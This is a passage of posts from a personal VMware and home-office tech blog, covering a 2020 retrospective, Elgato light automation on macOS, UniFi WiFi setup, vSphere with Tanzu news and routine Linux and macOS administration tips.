to the opportunities provided by remote work, and I anticipate that my own travel requirements will be reduced considerably in the future, as a direct result of 2020 being the very definition of annus horribilis. Naturally events like VMworld was an online-only event this year, and I suspect that will be the case at least in 2021 as well—if not even longer. Who in their right minds wants the liability of gathering 10-20k people in a single location in 2021? Doing these kinds of events online simply isn’t the same, in any way, and that is pretty sad. The same goes for VMUG events, even if we did have a great Nordic online event in 2020. I think this is what I’ve missed most this year, the physical conference experience. Well, that an actually being able to attend private events, like concerts and the like. Oh my, I miss concerts. In the mean time; Wear a damn mask and socially distance, won’t you? All things considered, 2020 has probably been one of my busiest years to date. I moved into a new role as Chief Technnologist SDDC last April, which basically translates to Lead Architect on any SDDC project we come across, as well as having the Technical Lead role for our team of SDDC consultants. This also means that I’m involed much earlier in projects than before, and often as a lead in customer engagements. It’s very been interesting, as it’s a move away from being a pure architect/consultant, to a more pre-sales and high level resource, in what is essentially the Office of the CTO. I have to say, I do enjoy the change! For us, 2020 has been and incredible year with some really exciting projects with some high profile clients. This is especially true with regards to VMware Cloud Foundation which seems to be gaining som real traction here in Norway. In short, we’re nearing capacity on the consultants we have available, and we need to grow the team in 2021. As far as vNinja.net goes, 2020 has been a mixed bag. On the plus side, the site turned 10 years in 2020, and this is the 26th post of the year. Not too shabby on the content side, really. I’m surprised the post count is that high. On the negative side, I have ignored the look and feel of the site for quite some time, mostly due to my lack of inspiration (I have done a lot of work on the back end of things though they are not really visible), but I’ll try to redesign at least parts of it in 2021. 2020 was the year I contributed to a book again, writing one of the chapters in IT Architect Series: Stories from the Field, Vol. 1, as well as contributing as an editor for a number of the other chapters in the book. For a forward looking post, that’s more than enough retrospection, lets look forward instead as I think we all need to do that right about now. Here is my attempt at setting some goals for 2021, if the world doesn’t completely implode that is. Forward Looking Statements: 2021 Edition # Professional Goals # Continue to grow the Proact SDDC practice in Norway — The past four years has been fun, and there is no reason why that shouldn’t continue into 2021. As mentioned above, we’re in need of more resources in the SDDC Team, and growing the team will be one of my main priorities in 2021. Tanzu / Kubernetes — Some might say I’m a bit behind the curve on this, but I feel like we’re at a tipping point right now where all existing vAdmins and vArchitects needs to take this new world seriously. As an architect I need to educate myself on how this affects the designs we’re creating for customers. This naturally ties into the adoptation we’re seeing with VMware Cloud Foundation as well. Upgrade Home Lab — I have been without a proper home lab for a couple of years now, and since we have a rather beefy lab at work, it hasn’t been that much of a problem. However, new requirements pop up from time to time, and it would be nice to have a small lab at home to do quick lab work in. I have a few specific projects in mind, that my old one-node Dell Workstation simply doesn’t have the resources to do, hopefully I can get this sorted early in 2021, and start developing my evil plans. Naturally, this ties in with the item above regarding Tanzu / Kubernetes. Redesign vNinja.net — Not sure if this should be in the Professional, or Personal list, but the site needs some TLC and design updates as it’s mostly stayed unchanged since I swiched to Hugo in 2018. Certifications # Since I work for a VMware partner, there are some requirements that we need to fill, and some of those naturally end up on my desk. VMware Certified Master Specialist - HCI — This one is at the top of my list, as we’re a part of the VMware Ignite Practice Boost program for HCI. VMware SME Program — Be more active in the VMware SME program. I didn’t partake in it much in 2020 and would like to rectify that for 2021. Personal Goals # Guitar — Learn to play some guitar. Note, not master, but being able to play some. Perhaps even a whole song?! This has been on my unofficial goal list for years and years, but for some reason you don’t really get good at something without actually practicing. Who knew? Photography — Get back into the groove of taking photos, regularly. I’ve been slacking on this for way to long, and I don’t really know why. This was also on my list for 2017, so it’s not new. I have enough equipment to start my own portrait studio (Studio strobes, remote triggers, softboxes, reflectors etc.) should I want to, so I better make use of it in 2021. Home Assistant — I want to utilize Home Assistant even more than I do now. I have a pretty well working setup as is, tying a bunch of different stuff together, but there is a lot of untapped potential there that I look forward to looking into. Integrating Node-RED seems to be a natural way to go. There it is, my personal recap of the hell that has been 2020, and my goals for 2021. The goals might not be the most ambitious of all time, but then again who knows what curveballs 2021 will throw us. At least it’s somewhat achievable at least, and that has to be a good starting point. If 2020 has learnt us anything, it’s that anything can happen. At any time. Lets all hope for a better future, starting now. --- # Automating Elgato Key Lights From macOS Touch Bar URL: https://vNinja.net/2020/12/04/automating-elgato-key-lights-from-touch-bar/ Date: 2020-12-04 Author: christian Tags: elgato, macOS, Automator Since I recently got an Elgato Key Light Air for the Home Office of Isolation™, I’ve been playing around with how to automate it. I’ve seen a lot of people using Elgato Stream Decks for automating these lights, but I don’t really have the need for a dedicated device for this. At least not yet. As it turns out, it’s actually pretty easy to automate these lights via other means. The light itself runs a http server on port 9123, and via /elgato/lights it’s possible to connect to it’s internal API for remote control. There is even a Postman Collection available, which makes it very easy to get started with connecting and changing settings around. Since Postman also allows you to export your API calls as a curl command, building the query in Postman is very handy Once I had two working commands, one for turning the light on with my preferred settings, and one for turning it off, I saved those as two different shell scripts: elgato-on.sh # This script turns the light on, sets the brightness to 10 and the temperature to 162. Pretty straight forward. elgato-off.sh # This script is even simpler, it just turns the light off. If you decide to use these, be sure to replace <your lights ip> with your Elgato lights actual IP-address in your own network All this is well and fine, and running these scripts does the job nicely. By using iCanHazShortcut, and have added keyboard shortcuts for triggering them: But then it dawned on me, my MacBook has this pretty Touch Bar that seldom gets any love, or usage for that matter. There had to be a way of creating something for this there as well, right? Turns out, there is, and it’s actually pretty simple to add your own actions to the macOS Touch Bar. Adding Custom Quick Actions to the macOS Touch Bar # First off, open System Preferences -> Keyboard -> Customize Control Strip and drag the Quick Actions button to your Touch Bar Create Quick Action in Automator Find Run Shell Script and double click it. Set Workflow receives to no input and put in the details for your script in the Run Shell Script window. Set the color you want to have for your Touch Bar button and save the Quick Action with your preferred name, I used Key Light On and Key Light Off for mine. Repeat steps 1-5 for the second script. Once saved, they should appear under the Quick Actions button on the Touch Bar (added in step 1) Now I can control turning the light on and off, both from my Touch Bar and via keyboard shortcuts! --- # Using VMware Validated Design Stencils in Draw.io URL: https://vNinja.net/2020/11/30/using-vmware-vvd-stencils-in-draw.io/ Date: 2020-11-30 Author: christian Tags: VMware, VVD, VMware Validated Design, Diagram Ryan Johnson who works on VMware Validated Design, has created a GitHub repository for VMware stencils. The repository contains the stencils used for VMware Validated Designs in SVG, Visio and OmniGraffle formats, as well as a very nice Powerpoint presentation that shows how to use the stencils. Great work Ryan, and team, annd thanks for making these available! But since I mostly use diagrams.net these days, I figured I’d try to import these and see if they work there as well. I had no success actually importing the files by going to File->Import but it turns out there is an even easier way to import the Visio *.vssx files. All it takes is simply downloading the files from the GitHib repository, and dragging and dropping them into the web app, or the desktop app, for them to show up ready for usage in your design diagrams! Once they’re added, you’ll find two new shape folders on the left hand side, named vmw_Icons.vssx and vmw_colors.vssx. These can be renamed to whatever you want, to make them easier to identify. Also, in case you were unaware, diagrams.net already include some of the VMware Validated Design stencils by default, but not the complete set. You can find the included ones by clicking +More Shapes… in the bottom left, scrolling down to VMware under Networking and adding them. --- # Issues Connecting Elgato Key Light Air to Ubiquiti UniFi Wireless Networks URL: https://vNinja.net/2020/11/30/issues-connecting-elgato-key-light-air-to-ubiquiti-unifi-wireless-networks/ Date: 2020-11-30 Author: christian Tags: networking, ubiquiti, USG, UniFi, WiFi, elgato I recently bought an Elgato Key Light Air for use in the home office, since most of my time is spent in online meetings these days. We’ve also recently started recording som Proact videos, and proper lighting is key (pun intended). I’ve been working from home, pretty much exclusively, since March and proper lighting hasn’t realy been an issue. I’m lucky enough that my home office has two large windows, located directly behind my screen so natural lighting has been plentiful. Fast forward to the end of November, and natural light is no longer in abundance here in Norway. I’ve been able to work around it with a couple of Phillips Hue Go lamps, but those really work better as accent light, as it’s hard to place them anywhere else than directly on the desk itself. Happily I ordered the Elgato Key Light Air, as that should provide the light that I was lacking. Assembling and connecting it was very easy, but when it came to adding it to my home WiFi I ran into some unexpected issues. As is customary with this kind of IoT-ish device, the setup is to connect to it’s own WiFi through a management app, in this case the Elgato Control Center, and then use that to connect it to the WiFi of your choice. For the life of me, I couldn’t get the Key Light to connect to my home WiFi, it just timed out with an unexpected error—which is very unhelpful. A quick Google search led me to Key Light – What network types are compatible? which clearly states that the supported wireless frequency is 2.4Ghz. My home network, based on Ubiquity UniFi, runs in both 2.4Ghz and 5Ghz mode and should be compatible. I did have a suspicion though that the dual-band WiFi setup as the culprit, and decided to create a new SSID and lock it to 2.4Ghz and see if that fixed the connection issue, and of course, it did. While that did fix the initial connection issue, and enabled control of the Key Light from the app on my phone, I didn’t want to have a seperate SSID just for this device, nor did I want to downgrade my home network to only run on the 2.4 Ghz band. So, now what? Turns out, the solution was pretty simple. All I had to do, was to momentarily remove the 5 Ghz band from my home WiFi, connect the light when only 2.4 Ghz was available, and then re-enable dual band WiFi after the connection had been made. How to edit UniFi WiFi band selection # Log into the UniFi controller, and go to Setting (the Gear icon on the bottom of the left) Choose WiFi, and hover over the SSID you want to edit Click edit, and then expand the Advanced section I changed it to 2.4 Ghz, let the controller provision the settings to my APs, used the Elgato Control Center to connect the Key Light Air to my now 2.4 Ghz only WiFi, and once the setup was successfull I re-enabled the Both (2.4 & 5 Ghz) settings again for my SSID. So far that’s been working perfectly, with no issues controlling the light even after changing the network settings back after initial configuration. --- # vExpert 2021 Applications are now Open! URL: https://vNinja.net/2020/11/24/vexpert-2021.md/ Date: 2020-11-24 Author: christian Tags: vExpert, VMware In case you weren’t aware, applications for VMware vExpert 2021 is now open. See the official announcement for details. The applications are open until January 9th 2021, and the announcement of the class of 2021 is scheduled for February 19th 2021. The VMware vExpert program is VMware’s global evangelism and advocacy program. The program is designed to put VMware’s marketing resources towards your advocacy efforts. Promotion of your articles, exposure at our global events, co-op advertising, traffic analysis, and early access to beta programs and VMware’s roadmap. The awards are for individuals, not companies, and last for one year. Employees of both customers and partners can receive the awards. In the application, we consider various community activities from the previous year as well as the current year’s (only for 2nd half applications) activities in determining who gets awards. We look to see that not only were you active but are still active in the path you chose to apply for. – https://vexpert.vmware.com/ I’m lucky enough to be one of the vExpert Pros, so feel free to reach out if you have any questions about the program or the application process itself—I’d be happy to help out in any way I can! Don’t hesitate, reach out to your local vExpert Pro, or submit your vExpert application now. --- # macOS: Aggregate Device for Teams - Fixing Auto-Adjusting Mic Level URL: https://vNinja.net/2020/11/06/macos-aggregate-device-for-teams.md/ Date: 2020-11-06 Author: christian Tags: macOS, Audio, Teams After working pretty well for many, many months, my external mic, a Blue Yeti, suddenly started having issues in Microsoft Teams on macOS. The issue was isolated to Teams, other video and audio solutions worked fine. For some reason, Teams had decided to start auto-adjusting the input level on its own, rendering it pretty useless. While some might say it’s a blessing that I get auto-muted, seemingly at random, but for me at least it’s pretty annoying. Changing to the internal mic in my MacBook did the trick, but that’s not really a solution when you have a proper external microphone! According to Microsoft Teams UserVoice, lots of people are having issues with this, so hopefully a real fix for this issue is on it’s way. Bjoern Brundert also tweeted about the issue, and how he solved it with a virtual microphone device, which got me thinking it should be possible to do this also with built-in macOS tools. Turns out, you can! Creating a Virtual Aggregate Microphone Device in macOS # Start Audio Midi Setup from Applications->Utilities This will show the available audio devices, both input and output. Click on the small + on the bottom left, and select Create Aggregate Device. Select the inputs you want to include in aggregate device group, here I selected my Yeti. Rename the Multi-Output Device to something that makes sense to you, by clicking its name. Restart Teams, if it’s already running, to make the new device available, and switch to the newly created aggregate device as your input source! That’s it! Turns out Microsoft Teams does not auto-adjust the levels on virtual devices like this, so you’ll be able to still use your external microphone simply by putting it into a Aggregate Device, without a requirement for any 3rd-party software. Now all we have to do is wait for Microsoft to actually fix the issue, so we don’t have to rely on workarounds like this to be able to use our equipment. --- # VMworld 2020: vCommunity Discord URL: https://vNinja.net/2020/09/24/vmworld-2020-vcommunity/ Date: 2020-09-24 Author: christian Tags: VMworld, VMware, VMworld 2020, Orbital Jigsaw VMworld 2020 is soon upon us, and due to the current world situation it’s an online only event this year. Personally I think this is a big loss, mostly because I usually spend most of my time at VMworld networking and speaking to people I often only see once a year, something that simply will not happen this year. In fact, I usually spend more time in the Blogger / Community Lounge than I do in sessions. There are many reasons for this, but the main one is that I’m kind of a social being. Now the physical aspect of VMworld 2020 has been taken away, and the entire conference is a streamed event, which really bums me out. While I am sure the content will be as good, or perhaps even better, than it usually is the whole conference experience has been removed from the equation. One of the things that I really enjoy about attending VMworld, is the fact that I’m physically there, which makes it easier to focus. This time around, it’ll be more of a yet another day or two in the home officeTM style event, which frankly is getting a bit tired. Thankfully Nick Howell and Jeramiah Dooley took the baton, and has tried to recreate or even re-invent some of the social aspects of the conference experience, on Discord. While I’m under no illusion that this will replace a physical event, it’s nice to see community members step up and try to offer an alternative to the famed hallway track. Community is hard. Community has been something that vendors of all shapes and sizes have managed with varying degrees of success at conferences, and we think that, especially with the pandemic, we can build the infrastructure that makes community easier to organize and coordinate. Orbital Jigsaw is the virtual conference center: it’s a place people gather, a place where discussions happen, a place where people put context to the content. It has rooms for content, rooms for discussion, rooms for play, whatever the community needs. Video, audio, text, links to collateral, places to talk shop with partners, all in one place, and all consistent from conference to conference. – Jeramiah Dooley It will be interesting to see how this works out in reality. Like many things right now, things are a bit of an experiment and we need to adapt and overcome somehow. I’ll be hanging around Orbital Jigsaw as much as time permits during VMworld, perhaps I’ll see you there? For more details, see Jeremiah’s posts VMworld 2020: Time for Community to Shine Community VMworld 2020: Time to Volunteer! --- # Photon OS 3.0 Template Gotcha URL: https://vNinja.net/2020/09/23/photon-os-30-template-gotcha/ Date: 2020-09-23 Author: Tags: vSphere, Photon, Template Photon OS is VMware’s minimal Linux distribution, and in a small project in the lab I thought I should use it for some small lightweight Veeam Backup & Replication v10 Linux proxies. After deploying it, and converting it to a template, I ran into some very frustrating authentication issues after deployment. To make a very long troubleshooting story short, I forgot to ensure that a new unique machine-id was created, wrecking havoc with, amongst other things, the DHCP server assignments. From the machine-id man page # The /etc/machine-id file contains the unique machine ID of the local system that is set during installation or boot. The machine ID is a single newline-terminated, hexadecimal, 32-character, lowercase ID. When decoded from hexadecimal, this corresponds to a 16-byte/128-bit value. This ID may not be all zeros. So remember, if you want to use Photon OS (and many other Linux distributions) as a template in vSphere, make sure the last command you run before shutting down and converting to a template, forces generation of a new machine-id. The quickest way I thought of forcing this, is to run the following command: echo -n > /etc/machine-id This simply overwrites the /etc/machine-id file with a new empty one, forcing a new machine-id to be generated at the next boot. This is not a Photon OS specific issue as such, more a general Linux (and FreeBSD) one, but it was in Photon OS it came back to bite me. In many regards it’s akin to not forcing a new Security ID (SID) to be created for cloned Windows VMs, which also causes all sorts of problems, especially for domain joined machines. --- # VMworld 2020: vTrail Map URL: https://vNinja.net/2020/09/22/vtrailmap2020/ Date: 2020-09-22 Author: christian Tags: VMworld, VMware, VMworld 2020 vTrail Map by Yadin Porter de León and the Level Up Project is usually a physical resource that gets handed out at VMworld. Since the world is pretty much in lockdown, and VMworld is a virtual only conference this year, the vTrailmap 2020 has been transformed into an online resource and experience! In short, vTrail Map is a community guide for the virtualization community. As I’m lucky enough to be a vTrail Map Champion for VMworld 2020, it’s really fun to announce that the first virtual vTrail Map is now live! This years edition is sponsored by Veeam, and the team behind it has really gone above and beyond to create something really unique: Think Habbo Hotel meets Where’s Waldo! vTrail Map 2020 # Go explore the virtual environment, and look around for fun easter eggs, and see if you can recognize anyone! There is even a role-playing adventure game coming later! --- # IT Architect Series: Stories From the Field, Vol. 1 URL: https://vNinja.net/2020/09/21/it-architect-series-stories-from-the-field-vol1/ Date: 2020-09-21 Author: christian Tags: Recommended, Reading, Books A new book, the fourth in the series, from the crew behind the IT Architect series of books has finally been released: IT Architect Series: Stories From the Field, Vol. 1. Synopsis # What is it like to be engaged on an IT project when it turns into a horror story?! Thirty-five prominent IT professionals describe their most challenging datacenter projects and provide insights into why failures occurred, including lessons learned and what they would do differently. Recommended reading for members of the IT community who deliver IT solutions in the field and want to avoid learning the hard way… I have been fortunate enough to be able to contribute one of the chapters in this book, alongside quite an all star list of a total of thirty five contributors. I have also contributed as an editor for quite a few of the stories. In my opininion, this is another must have book for all aspiring and existing IT infrastructure architects and fits in really well with the previously released books in the IT Architect Series. Since the book highlights failures in IT projects, and lessons learned all stories has been anonymized and which author has contributed which story is left as a guessing exercise for the readers. Each of the stories hightlights potential pitfalls and paths to resolve issues that might arise in IT architecture projects, as well as provide some background into why something failed. I am sure this will be a very useful resource for many, as well as provide real world learning based on real projects. Contributors # The list of contributes is quite a list, and I’m honored to be amongst them! Abdullah Abdullah, Johan van Amersfoort, John Yani Arrasjid, Steve Athanas, Marco van Baggum, René van den Bedem, Doug Baer, Daemon Behr, Hans Bernhardt, Michael Berthiaume, Jayson Block, Wayne Conrad, Paul Cradduck, Sachin Dharmadhikari, Tony Foster, Mark Gabryjelski, Faisal Hasan, Ray Heffer, John Kozej, Christopher Kusek, Sean Massey, Wences Michel, Christian Mohn, Geoffrey O’Brien, Josh Odgers, David Quinney, Bas Raayman, Yves Sandfort, Rachit Srivastava, Jorge Torres, Raman Veeramraju, Matthew Wood, Szymon Ziolkowski, Chip Zoller. Details # Associate editor: Mark Gabryjelski Cover design or artwork by: Ioannis Dangerous Age Editor-in-chief: Matthew Wood Managing editor: John Yani Arrasjid Paperback: 291 pages Language: English Announcement: ITA Series – Book 4 Releases Order your copy today! # --- # VMware Announcements September 2020 — The Resource List URL: https://vNinja.net/2020/09/15/vmware-announcements-september2020/ Date: 2020-09-15 Author: christian Tags: vSphere, VMware, Kubernetes, Tanzu, vSAN, VCF Today saw a bunch of announcements from VMware, including vSphere 7.0 Update 1, vSAN 7.0 Update 1, VMware Cloud Foundation 4.1 and I thought it might be useful to post a list of some of the resources that has been published. General Resources # A new home for VMware Technical Content: VMware Core Tech Zone VMware Announcements # Announcing VMware vSphere with Tanzu: The Fastest Way to Get Started with Kubernetes What’s New with VMware vSphere 7 Update 1 vSphere 7 Update 1 – AMD SEV-ES What’s New with VMware Cloud Foundation 4.1 What’s New in vSAN 7 Update 1 Announcing vSAN Data Persistence Platform VMware Videos # A Quick Look at What’s New in vSphere 7 Update 1 # What’s New in vSAN 7.0 Update 1 # Demo Videos by Duncan Epping # vSAN 7.0 Update 1 new feature: IO Insight # vSAN 7.0 Update 1 new feature: vSAN HCI Mesh aka Datastore Sharing # vSAN 7.0 Update 1 delivers compression only and capacity rebuild reservations # Community Resources # Quite a few vCommunity members have posted their announcement posts and thoughts as well. I’m sure some are missing from this list, but I’ll update it as times goes on. All About vSphere 7 U1 Features by Melissa Palmer What’s New in vSAN 7 Update 1? The Important Bits by Ather Beg What’s New in vSphere 7 Update 1? The Important Bits by Ather Beg What is new in vSphere 7 U1, vSAN 7U1 and VCF 4.1 by Kim Bottu VMware vSphere 7.0 Update 1 – What’s coming soon? by Graham Baker VMware vSAN 7.0 Update 1 – All the new features by Graham Baker Introducing VMware vSphere and vSAN 7 Update 1 and VCF 4.1 by Bryan van Eeden VMware vSphere 7 Update 1 vSAN 7 Update 1 VCF 4.1 Announced New Features by Brandon Lee Scaling without Compromise with vSAN HCI Mesh and VCF Remote Clusters by Bhavin Shah vSAN 7.0U1 – What’s new? by Cormac Hogan What’s new for vSAN 7.0 U1!? by Duncan Epping --- # VMware vSphere 7 Update 1 With Tanzu News URL: https://vNinja.net/2020/09/15/vmware-vsphere7-with-tanzu/ Date: 2020-09-15 Author: christian Tags: vSphere, VMware, Kubernetes, Tanzu VMware has announced the upcoming vSphere 7 Update 1 release, with some very welcome news for everyone who wants to run Kubernetes in their VMware estate. Previously, the only way to get vSphere wth Kubernetes, was to run it in VMware Cloud Foundation. With this new update, this is no longer the case! vSphere with Tanzu Overview vSphere with Tanzu (not vSphere with Kubernetes) is offered as a drop-in in an existing vSphere 7 Update 1 installation. The feature is enabled through a wizard that guides you through the setup. Since it can use a vSphere Distributed Switch, there is no NSX requirement to enable it. Of course, it can use features in NSX if that is available, and some features might also only be available if NSX is present (like the vSphere Pod Service), but as a basic installation only requires a VDS with three Port Groups; Management, Frontend and Workload. The install wizard creates the Kubernetes control plane nodes on vSphere, and connects it to the management and workload networks. The embedded Kubernetes control plane then exposes a set of services, including the Tanzu Kubernetes Grid Service for vSphere. The TKG Service gives developers access to upstream aligned, fully conformant Kubernetes clusters, right inside your existing vSphere 7 infrastructure. You even get a choice of which load balancer to use, including HAProxy. Not only has VMware with this move adressed the VMware Cloud Foundation requirement for getting started with running modern applications on vSphere, but since there is no requirement for NSX or even vSAN for this to work, the basic entry-level point has been dramatically lowered. This is basically Kubernetes infrastructure on vSphere, with your choice of networking, storage and load balancing solutions! In fact, you can enable it and run a standard VMware trial of 60 days, without requiring a license, just to dip your toes in the water. From what I gather, the licensing is also simplified, and vSphere with Tanzu is a per socket license like vSphere itself. vSphere Enterprise Plus licensing is required to enable the feature. Credit where credit is due; I think this is really great news! It adresses all my previous concerns about the scale of investment needed, and with the reduced requirements this makes it feasible for many customers to gain experience with running Kubernetes workloads besides their existing VMs. VMware’s messaging on this is (finally) simplified, and makes sense. VCF with Tanzu is the best way to run Kubernetes workloads at scale, and vSphere with Tanzu is the fastest way to get started. Updates 15. September 2020 # The release date has not been announced yet, but it looks like it might be sooner rather than later, and well before the end of the year — Remember VMworld 2020 is right around the corner as well. In the announcement at the VMUG Virtual user/con in Boston on the 15th of september, Lee Casswell VP Storage and Availability for VMware, confirmed the release date as the 6th of October 2020. I would also expect that we will see new packaging and feature Tanzu editions in the future, as it seems like VMware finally seem to get their story around PKS, Project Pacific, the Tanzu Portfolio and Kubernetes straightened out and clarified. In Simplify Your Approach to Application Modernization with 4 Simple Editions for the Tanzu Portfolio indeed announces Tanzu Editions: Basic, Standard, Advanced and Enterprise. Basic and Standard will be available this quarter. Other Resources # What’s New with VMware vSphere 7 Update 1 Getting started with vSphere with Tanzu by Cormac Hogan vSphere with Tanzu Whiteboard Video # --- # vNinja 10 Years URL: https://vNinja.net/2020/07/21/vninja-10-years/ Date: 2020-07-21 Author: christian Tags: vninja, site, news July 21st marks the 10th anniversary of vNinja.net! # 3654 days. 120 months. 10 years. 2010 to 2020. A decade. That is a long time. A lot has changed in these 10 years, and looking back at my first post on this site makes that very evident — the name even changed, pre launch! The original name was vmaware and I even had the domain registered and configured, but before I made the site live I found out someone else was already using that, but under a different tld. Luckily I caught it, rookie mistake on my part — I know, before I launched the site and changed it to vNinja instead. vNinja.net was powered by Wordpress from the start, until I moved it over to Hugo in 2018 — incidentally almost to the day eight years after going live, so this also marks two years of running Hugo as the site generator. If I had noticed at the time I would have postponed the switch a couple of days to have it aligned. Clearly the focus has been more on virtualization and specifically the VMware suite of products, more than any other technology I mentioned in my first post, but like everything else in life, it evolves. Who knows what is going to change in the next ten years? I sure don’t, so I won’t be making any predictions. Content Statistics # Ten years online has resulted in a bit of content, and a quick line and word count resulted in the following raw statistics: Total number of posts: 357 (~ ls -la | wc -l) Total number of lines: 18.742 (~ cat * | wc -l) Total number of words: 136.548(~ cat *| wc -w) A “novel length” book is usually between 70.000 and 110.000 words, I guess I’ve published enough content to actually go beyond that definition. It’s even closing in on it being two short novels, in total. Not that I think any of the stuff I’ve published here should ever really be found in print, it’s still fun to think about. As far as traffic goes, I don’t really keep too track of it, so I wouldn’t know many hits or pageviews the site has have over the years. It’s been a bit, that much I can say. Guest Authors and Posts # Over the years, there has been a total of four guest authors, providing total of 5 posts: Posts by Ed Czerwin 17th Jul 2011 SMB Shared Storage Smackdown - Part 1 NFS Performance Posts by Shane Williford 13th Aug 2015 HP Proliant DL380p Gen8 “Decompressed MD5” error Posts by Espen Ødegaard 10th Nov 2015 vCenter / SSO unable to retrieve AD-information | Error while extracting local SSO users Posts by Bjørn A. Jørgensen 9th Jan 2018 The Curious Case of the Intel Microcode 14th Jan 2018 The Curious Case of the Intel Microcode Part #2 - It Gets Better — Then Worse Huge thanks to everyone who has actually read some, or all of it, over the years — it’s much appreciated! --- # macOS: Hiding Menu Bar Icons With Dozer URL: https://vNinja.net/2020/05/27/macos-hiding-menu-bar-icons-with-dozer/ Date: 2020-05-27 Author: christian Tags: macOS The macOS Menu Bar tends to get cluttered over time, as applications really like to put an icon up there for some reason. I’m aware that you can remove most of them by dragging the icon away from the menu bar, while holding down command (⌘), but some times the icons are useful when you need them. They just doen’t have to be in your face all the time. A simple solution, is to install Dozer. A small, free utility that allows you to hide pretty much everything besides the battery meter, time and icon for the Notification Center, while at the same time making it easy to show the ones I’ve decided to keep there for quick access. I’ve pretty much hidden everything now, look how neat this is! Since many of us are working from home, via video, and often end up sharing a desktop or application to show something, hiding all those status bar icons makes sense also from that perspective — In the same sense that I have turned off mostly all notifications. Why something like this isn’t built-in to macOS is beyond me, but at least there is an easy to use, and free, solution to Menu Bar Icon sprawl! Download Dozer from GitHub or if you use Homebrew, install it via cask: ~ brew cask install dozer --- # macOS: Split Tunnel L2TP VPN Routing URL: https://vNinja.net/2020/05/27/macos-split-tunnel-vpn-routing/ Date: 2020-05-27 Author: christian Tags: macOS, VPN, Networking I use my Ubiquiti USG for Remote User VPN Using L2TP, but L2TP does not provide routing information to the client, so I needed a way to automatically create routes when the VPN connection fires. Thankfully, this is pretty easy in macOS (and Linux). The /etc/ppp/ip-up file, if present, triggers every time a PPP (L2TP is based on PPP) connection is made, thus making it easy to trigger a route command when a connection is established. My /etc/ppp/ip-up looks like this: #!/bin/sh /sbin/route add -net <my home network subnet>/24 -interface $1 Replace <my home network subnet>/24 with your network information, and you should be ready to go. Note: This doesn’t diffenciate if you have several L2TP VPN connections, and the script runs regardless of which connection you use. I am sure there are ways of doing different routes based on which connection is triggered, but I haven’t had a need to do that so far" Running netstat -rn after making a connection, should now show a line similar to the one below, where xxx.xxx.xxx is your remote subnet, routed over a ppp interface ~ netstat -rn Routing tables Internet: Destination Gateway Flags Netif Expire ... xxx.xxx.xxx ppp0 USc ppp0 ... --- # VMware Updates Minimum Requirements for vSphere 7 With Kubernetes in VCF URL: https://vNinja.net/2020/05/25/vmware-vsphere7-with-kubernetes-vcf-update/ Date: 2020-05-25 Author: christian Tags: vSphere, Cloud Foundation, VMware, Kubernetes, Tanzu VMware has updated the requirements for running Kubernetes workloads on VMware Cloud Foundation, and I’m happy to see that the requirements has been scaled down quite a bit. The news is that it is now supported to enable the Kubernetes Supervisor Control Plane on the management Workload Domain, letting go of the hard requirement of running it in a separate Workload Domain, instead it runs in a Resouce Pool. This is called a consolidated architecture in VMware Cloud Foundation, and it means that the minumum host requirement has been scaled down from 7 hosts to a minimum of 4 hosts. As the Management Workload Domains principal storage requirement is vSAN, the requirement is a minimum of 4 nodes. Other requirements are still the same, but this should make it much easier to set up a Proof-of-Concept, or lab environment. It’s even supported for production, although for small environments. For more details, see the Enabling vSphere with Kubernetes White Paper whitepaper. This answers some of the critisism I’ve voiced around vSphere 7 With Kubernetes and it’s a welcome step in the right direction Update 26th May 2020 # Cormac Hogan has published a detailed walkthrough on how to set it up in vSphere with Kubernetes on VCF 4.0 Consolidated Architecture. --- # VMware vSphere 7 With Kubernetes and Tanzu Resources URL: https://vNinja.net/2020/05/12/vmware-with-kubernetes-and-tanzu/ Date: 2020-05-12 Author: christian Tags: vSphere, Cloud Foundation, VMware, Kubernetes, Tanzu The dust has settled a bit after the big VMware vSphere 7 release, and vSphere 7 with Kubernetes, and there is now some really good resources available for those looking into the details about the various Kubernetes and Tanzu parts of it. Photo by Ben White on Unsplash Here’s a list of fresh content that I’ve found either educational or just simply enlightening on this topic: Cormac Hogan recently published Understanding the Tanzu portfolio (and the new names for VMware modern app products) which is a must read for anyone who is looking for clarification on what the different components that make up the Tanzu portfolio is — and to be honest, most of us probably do need a 101 lesson here. vSphere 7 with Kubernetes – 2 Node Lab Deployment by Viktor van den Berg shows how can get away with running two ESXi hosts for a vSphere 7 with Kubernetes. Pretty awesome, and should make for a great lab exercise. William Lam has even got a post up on doing it with one host(!!), as shown in Deploying a minimal vSphere with Kubernetes environment. The team behind VMware Cloud Foundation Lab Constructor (VLC) has made VLC 4.0 Public beta available: Today I am happy to announce that the VLC 4.0 Public beta (VCF Lab Constructor) is now available. This powerful tool can build an entire nested VCF 4 Lab. To learn more about VLC see the blog below. VLC 4 beta is available to registered users in VLC Slack. https://t.co/OIhiAMLZKs — SDDC Commander (@SDDCCommander) May 8, 2020 I’ve used VLC to run live Cloud Foundation demos in various settings before, and it works really well. Check out the Using Tanzu Kubernetes Grid to Deploy Kubernetes with Ease webinar by Kenny Coleman. Last, but not least, William Lam is at it again, with it being awesome. This time he’s made a Demo Appliance for Tanzu Kubernetes Grid (TKG) Fling available. With this you don’t need anything but this appliance to be able to play around with TKG! Running vSphere 7 with Kubernetes in the lab is definitively on my TODO list! By the way, you can find all of William’s vSphere with K8s and TKG articles easily as well. --- # The Problem with VMware vSphere 7 With Kubernetes URL: https://vNinja.net/2020/03/10/vmware-vsphere7-with-kubernetes/ Date: 2020-03-10 Author: christian Tags: vSphere, Cloud Foundation, VMware, Kubernetes All in all, Cloud Foundation 4.0 seems to be a solid version upgrade, with a lot of promise. The tight integration between Cloud Foundation and vSphere with Kubernetes, coupled with the other managementment tools already available from VMware should prove to be a solid foundation (pun intended) for anyone looking to provide both traditional virtualization and container workloads in their on-premises datacenters going forward. The problem, in my not so humble opinion, with this is that vSphere with Kubernetes is (for now?) only available through Cloud Foundation 4.0. That is a very limiting form factor for delivery, and something that might just slow the adoption rate for it considerably. To launch this series, we’ll put a spotlight on the Tanzu Kubernetes Grid integration with vSphere 7, newly re-architected with Kubernetes to run both modern container-based and traditional virtual machine-based workloads and delivered exclusively on VCF 4. … By establishing vSphere 7 as a platform that consolidates containers and VMs into a single stack with the development tools and Kubernetes runtime, developers and operators can now collaborate. ref: https://blogs.vmware.com/cloud-foundation/2020/03/10/delivering-kubernetes-at-cloud-scale-with-vmware-cloud-foundation-4/ and The following breakthrough capabilities are available for customers using containers and Kubernetes. Note that the Kubernetes capabilities of vSphere 7 are available only as part of VMware Cloud Foundation 4 with Tanzu. ref: https://blogs.vmware.com/vsphere/2020/03/vsphere-7.html Turns out, you can not simply set up 